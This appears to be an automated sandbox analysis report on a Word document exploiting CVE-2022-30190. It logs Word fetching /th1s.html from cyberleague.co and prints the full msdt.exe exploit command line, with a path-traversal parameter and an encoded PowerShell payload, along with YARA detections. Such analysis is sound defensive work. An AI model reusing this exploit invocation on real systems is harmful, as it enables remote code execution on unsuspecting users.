                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><body> <script> //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            4192.168.2.34974813.250.15.191443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-06-03 21:03:19 UTC6OUTHEAD /th1s.html HTTP/1.1
                                                                                                                                                            Authorization: Bearer
                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                            Host: cyberleague.co
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            2022-06-03 21:03:19 UTC7INHTTP/1.1 200 OK
                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                            Date: Fri, 03 Jun 2022 21:03:19 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 5092
                                                                                                                                                            Connection: close
                                                                                                                                                            Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
                                                                                                                                                            ETag: "13e4-5e063d0e1ca1e"
                                                                                                                                                            Accept-Ranges: bytes


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            5192.168.2.34974913.250.15.191443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-06-03 21:03:20 UTC7OUTHEAD /th1s.html HTTP/1.1
                                                                                                                                                            Authorization: Bearer
                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                            Host: cyberleague.co
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            2022-06-03 21:03:20 UTC7INHTTP/1.1 200 OK
                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                            Date: Fri, 03 Jun 2022 21:03:20 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 5092
                                                                                                                                                            Connection: close
                                                                                                                                                            Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
                                                                                                                                                            ETag: "13e4-5e063d0e1ca1e"
                                                                                                                                                            Accept-Ranges: bytes


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            6192.168.2.34975013.250.15.191443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-06-03 21:03:20 UTC7OUTOPTIONS / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Authorization: Bearer
                                                                                                                                                            User-Agent: Microsoft Office Word 2014
                                                                                                                                                            X-Office-Major-Version: 16
                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                            X-FeatureVersion: 1
                                                                                                                                                            X-MSGETWEBURL: t
                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                            Host: cyberleague.co
                                                                                                                                                            2022-06-03 21:03:21 UTC7INHTTP/1.1 200 OK
                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                            Date: Fri, 03 Jun 2022 21:03:21 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            Connection: close
                                                                                                                                                            Allow: GET,POST,OPTIONS,HEAD,TRACE


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            7192.168.2.34975113.250.15.191443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-06-03 21:03:21 UTC8OUTHEAD /th1s.html HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Authorization: Bearer
                                                                                                                                                            User-Agent: Microsoft Office Word 2014
                                                                                                                                                            X-Office-Major-Version: 16
                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                            X-FeatureVersion: 1
                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                            Host: cyberleague.co
                                                                                                                                                            2022-06-03 21:03:22 UTC8INHTTP/1.1 200 OK
                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                            Date: Fri, 03 Jun 2022 21:03:22 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 5092
                                                                                                                                                            Connection: close
                                                                                                                                                            Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
                                                                                                                                                            ETag: "13e4-5e063d0e1ca1e"
                                                                                                                                                            Accept-Ranges: bytes


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            8192.168.2.34975213.250.15.191443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-06-03 21:03:22 UTC8OUTGET /th1s.html HTTP/1.1
                                                                                                                                                            Accept: */*
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                            Host: cyberleague.co
                                                                                                                                                            If-Modified-Since: Wed, 01 Jun 2022 14:36:34 GMT
                                                                                                                                                            If-None-Match: "13e4-5e063d0e1ca1e"
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            2022-06-03 21:03:23 UTC8INHTTP/1.1 304 Not Modified
                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                            Date: Fri, 03 Jun 2022 21:03:23 GMT
                                                                                                                                                            Connection: close
                                                                                                                                                            Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
                                                                                                                                                            ETag: "13e4-5e063d0e1ca1e"
                                                                                                                                                            Accept-Ranges: bytes


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            9192.168.2.34975313.250.15.191443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-06-03 21:03:24 UTC9OUTHEAD /th1s.html HTTP/1.1
                                                                                                                                                            Authorization: Bearer
                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                            Host: cyberleague.co
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            2022-06-03 21:03:24 UTC9INHTTP/1.1 200 OK
                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                            Date: Fri, 03 Jun 2022 21:03:24 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 5092
                                                                                                                                                            Connection: close
                                                                                                                                                            Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
                                                                                                                                                            ETag: "13e4-5e063d0e1ca1e"
                                                                                                                                                            Accept-Ranges: bytes


                                                                                                                                                            Statistics

                                                                                                                                                            Behavior

                                                                                                                                                            Click to jump to process

                                                                                                                                                            System Behavior

                                                                                                                                                            General

                                                                                                                                                            Target ID:0
                                                                                                                                                            Start time:23:03:06
                                                                                                                                                            Start date:03/06/2022
                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                            Imagebase:0xe80000
                                                                                                                                                            File size:1937688 bytes
                                                                                                                                                            MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Target ID:1
                                                                                                                                                            Start time:23:03:11
                                                                                                                                                            Start date:03/06/2022
                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                                                                                                                                                            Imagebase:0xb80000
                                                                                                                                                            File size:466688 bytes
                                                                                                                                                            MD5 hash:EA19F4A0D18162BE3A0C8DAD249ADE8C
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:moderate

                                                                                                                                                            General

                                                                                                                                                            Target ID:9
                                                                                                                                                            Start time:23:03:27
                                                                                                                                                            Start date:03/06/2022
                                                                                                                                                            Path:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX("powershell -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7AFsAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4ATQBlAHMAcwBhAGcAZQBCAG8AeABdADoAOgBTAGgAbwB3ACgAJwBIAGUAbABsAG8AIABpAHQAcwAgAG0AZQAhACAATQBhAHkAYgBlACAAeQBvAHUAIABjAG8AdQBsAGQAIABsAG8AbwBrACAAYQB0ACAAbQBkAHMAdAA/ACcAKQA7AA=="))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
                                                                                                                                                            Imagebase:0xab0000
                                                                                                                                                            File size:1508352 bytes
                                                                                                                                                            MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000009.00000002.553703750.0000000003140000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000009.00000002.554020054.00000000033A0000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000009.00000002.553580729.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000009.00000002.553717920.0000000003148000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                            Reputation:moderate

                                                                                                                                                            Disassembly

                                                                                                                                                            No disassembly